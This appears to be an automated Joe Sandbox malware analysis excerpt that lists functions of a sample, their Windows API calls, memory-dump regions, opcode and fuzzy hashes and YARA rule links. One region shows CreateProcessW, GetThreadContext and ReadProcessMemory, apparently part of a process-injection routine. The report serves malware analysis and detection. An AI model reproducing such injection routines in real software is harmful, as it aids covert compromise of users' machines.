                                                                                                                    • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3199840319-0
                                                                                                                    • Opcode ID: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                                                                                    • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                                                                                    • Opcode Fuzzy Hash: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                                                                                    • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                                                                                    Function 0040D6B0 Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeInfoLibraryParametersSystem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3403648963-0
                                                                                                                    • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                                    • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                                                                                    • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                                    • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                                                                                    Function 0040F110 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 823142352-0
                                                                                                                    • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                                                                    • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                                                                                    • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                                                                    • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                                                                                                    Function 00414A46 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                    • __lock_file.LIBCMT ref: 00414A8D
                                                                                                                      • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                                                                                    • __fclose_nolock.LIBCMT ref: 00414A98
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2800547568-0
                                                                                                                    • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                                                                    • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                                                                                    • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                                                                    • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                                                                                    Function 00414FE2 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __lock_file.LIBCMT ref: 00415012
                                                                                                                    • __ftell_nolock.LIBCMT ref: 0041501F
                                                                                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2999321469-0
                                                                                                                    • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                                                                    • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                                                                                    • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                                                                    • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                                                                                    Function 042082B5 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 04208A73
                                                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04208B09
                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04208B2B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2145500065.0000000004207000.00000040.00000020.00020000.00000000.sdmp, Offset: 04207000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_4207000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2438371351-0
                                                                                                                    • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                                                    • Instruction ID: 6f89f9e2c6dff9a8aeff840265d2d9a1641a58db3f097566c6175cf096747746
                                                                                                                    • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                                                    • Instruction Fuzzy Hash: E712EE20E24658C6EB24DF64D8507DEB272EF68300F1090E9910DEB7A5E77A5F81CF5A
                                                                                                                    Function 00402F00 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4104443479-0
                                                                                                                    • Opcode ID: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                                                                                                    • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                                                                                    • Opcode Fuzzy Hash: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                                                                                                    • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                                                                                    Function 00402780 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4104443479-0
                                                                                                                    • Opcode ID: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
                                                                                                                    • Instruction ID: 412edbf2df7bf8c64f36b821a583ca4e96a0f18e0b9aed18a790d0e499aeb9a1
                                                                                                                    • Opcode Fuzzy Hash: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
                                                                                                                    • Instruction Fuzzy Hash: 60319CB9600A21EFC714DF19C580A62F7E0FF08310B14C57ADA89CB795E774E892CB99
                                                                                                                    Function 00410CFC Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 544645111-0
                                                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                    • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                    • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                                                                                    Function 00408F40 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                                                                                    • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                                                                                    • Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                                                                                    • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                                                                                    Function 0045E17D Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                                                                                                    • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                                                                                                                    • Opcode Fuzzy Hash: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                                                                                                    • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                                                                                                                    Function 00414C76 Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __lock_file
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3031932315-0
                                                                                                                    • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                                                                    • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                                                                                    • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                                                                    • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                                                                                    Function 00443E36 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3934441357-0
                                                                                                                    • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                                                                    • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                                                                                                                    • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                                                                    • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                                                                                                                    Function 004149C2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __wfsopen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 197181222-0
                                                                                                                    • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                                                    • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                                                                                    • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                                                    • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                                                                                    Function 0040DA20 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2962429428-0
                                                                                                                    • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                                                                    • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                                                                                                                    • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                                                                    • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                                                                                                                    Function 042092B4 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNELBASE(000001F4), ref: 042092C9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2145500065.0000000004207000.00000040.00000020.00020000.00000000.sdmp, Offset: 04207000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_4207000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3472027048-0
                                                                                                                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                    • Instruction ID: 2a1075734b7313d1588d674292057b94eeb1db91198053080a187e9757154f9c
                                                                                                                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                    • Instruction Fuzzy Hash: 8FE0BF7494010DEFDB00EFA4D5496DD7BB4EF04301F1045A1FD05D7691DB309E548A66
                                                                                                                    Function 042092B8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNELBASE(000001F4), ref: 042092C9
